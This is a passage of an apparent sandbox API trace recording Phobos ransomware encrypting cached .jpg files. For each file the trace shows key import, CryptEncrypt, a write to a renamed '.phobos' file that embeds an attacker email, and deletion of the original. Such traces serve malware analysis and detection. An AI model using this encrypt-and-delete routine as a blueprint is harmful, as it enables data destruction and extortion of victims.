files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.571] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.571] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.571] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1bba, lpOverlapped=0x0) returned 1 [0178.040] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1bc0, dwBufLen=0x1bc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1bc0) returned 1 [0178.040] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1bc0, lpOverlapped=0x0) returned 1 [0178.041] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0178.041] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.041] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.041] CryptDestroyKey (hKey=0xa32be8) returned 1 [0178.041] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.041] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.041] CloseHandle (hObject=0x15c) returned 1 [0178.042] CloseHandle (hObject=0x17c) returned 1 [0178.042] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg")) returned 1 [0178.042] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.050] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2399) returned 1 [0178.050] CloseHandle (hObject=0x17c) returned 1 [0178.050] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg")) returned 0x2020 [0178.050] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.050] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.050] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.051] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.051] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x95f, lpOverlapped=0x0) returned 1 [0178.129] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x960, dwBufLen=0x960 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x960) returned 1 [0178.129] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x960, lpOverlapped=0x0) returned 1 [0178.130] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0178.130] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.130] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.130] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0178.130] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.130] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.130] CloseHandle (hObject=0x17c) returned 1 [0178.130] CloseHandle (hObject=0x15c) returned 1 [0178.130] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg")) returned 1 [0178.131] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.132] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9211) returned 1 [0178.132] CloseHandle (hObject=0x15c) returned 1 [0178.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg")) returned 0x2020 [0178.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.132] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.132] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.133] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.133] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x23fb, lpOverlapped=0x0) returned 1 [0178.149] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2400, dwBufLen=0x2400 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2400) returned 1 [0178.149] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2400, lpOverlapped=0x0) returned 1 [0178.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0178.150] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.150] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.150] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.150] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.150] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.150] CloseHandle (hObject=0x15c) returned 1 [0178.150] CloseHandle (hObject=0x17c) returned 1 [0178.150] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg")) returned 1 [0178.151] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.152] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10905) returned 1 [0178.152] CloseHandle (hObject=0x17c) returned 1 [0178.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg")) returned 0x2020 [0178.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.152] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.152] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.152] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.152] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.152] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2a99, lpOverlapped=0x0) returned 1 [0178.348] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2aa0, dwBufLen=0x2aa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2aa0) returned 1 [0178.348] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2aa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2aa0, lpOverlapped=0x0) returned 1 [0178.350] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0178.350] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.350] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.350] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.350] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.350] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.350] CloseHandle (hObject=0x17c) returned 1 [0178.350] CloseHandle (hObject=0x15c) returned 1 [0178.350] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg")) returned 1 [0178.351] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.352] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8206) returned 1 [0178.352] CloseHandle (hObject=0x15c) returned 1 [0178.352] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg")) returned 0x2020 [0178.352] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.353] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.353] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x200e, lpOverlapped=0x0) returned 1 [0178.407] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2010, dwBufLen=0x2010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2010) returned 1 [0178.407] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2010, lpOverlapped=0x0) returned 1 [0178.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0178.408] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.408] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.408] CryptDestroyKey (hKey=0xa327e8) returned 1 [0178.408] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.408] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.408] CloseHandle (hObject=0x15c) returned 1 [0178.408] CloseHandle (hObject=0x17c) returned 1 [0178.408] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg")) returned 1 [0178.409] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 